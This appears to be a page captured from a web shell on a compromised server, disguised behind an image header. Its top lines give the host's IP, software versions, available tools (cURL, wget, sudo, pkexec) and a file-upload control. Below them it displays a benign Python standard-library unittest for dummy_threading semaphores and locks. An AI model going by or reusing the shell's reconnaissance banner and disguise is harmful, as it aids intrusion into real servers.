????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.148.170.88 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/root/home/b8009/Python-3.6.3/Lib/test/ |
Upload File : |
from test import support
import unittest
import dummy_threading as _threading
import time


class DummyThreadingTestCase(unittest.TestCase):
    """Start a batch of tasks using the ``dummy_threading`` primitives.

    The tasks share three module-level globals that ``setUp`` (re)creates
    before every test: ``sema`` (a ``BoundedSemaphore`` with value 3),
    ``mutex`` (an ``RLock``) and ``running`` (an integer counter of tasks
    currently inside the semaphore).
    """

    class TestThread(_threading.Thread):
        """Task that enters ``sema`` and tracks itself in ``running``."""

        def run(self):
            """Enter the semaphore, bump ``running``, sleep, then undo it."""
            # Only ``running`` is rebound here; ``sema`` and ``mutex`` are
            # merely read, so they need no ``global`` declaration.
            global running
            # Uncomment if testing another module, such as the real 'threading'
            # module.
            #delay = random.random() * 2
            delay = 0
            if support.verbose:
                print('task', self.name, 'will run for', delay, 'sec')
            # ``with`` guarantees the semaphore and the lock are released
            # even if something inside the block raises.
            with sema:
                with mutex:
                    running += 1
                    if support.verbose:
                        print(running, 'tasks are running')
                time.sleep(delay)
                if support.verbose:
                    print('task', self.name, 'done')
                with mutex:
                    running -= 1
                    if support.verbose:
                        print(self.name, 'is finished.', running,
                              'tasks are running')

    def setUp(self):
        """Create fresh shared primitives and reset the bookkeeping."""
        self.numtasks = 10
        global sema
        sema = _threading.BoundedSemaphore(value=3)
        global mutex
        mutex = _threading.RLock()
        global running
        running = 0
        self.threads = []

    def test_tasks(self):
        """Start ``numtasks`` tasks, join them all, and check the counter."""
        for i in range(self.numtasks):
            t = self.TestThread(name="<thread %d>"%i)
            self.threads.append(t)
            t.start()

        if support.verbose:
            print('waiting for all tasks to complete')
        for t in self.threads:
            t.join()
        if support.verbose:
            print('all tasks done')
        # Every task increments and then decrements ``running``; a non-zero
        # value here means at least one task did not run to completion.
        self.assertEqual(running, 0)


if __name__ == '__main__':
    unittest.main()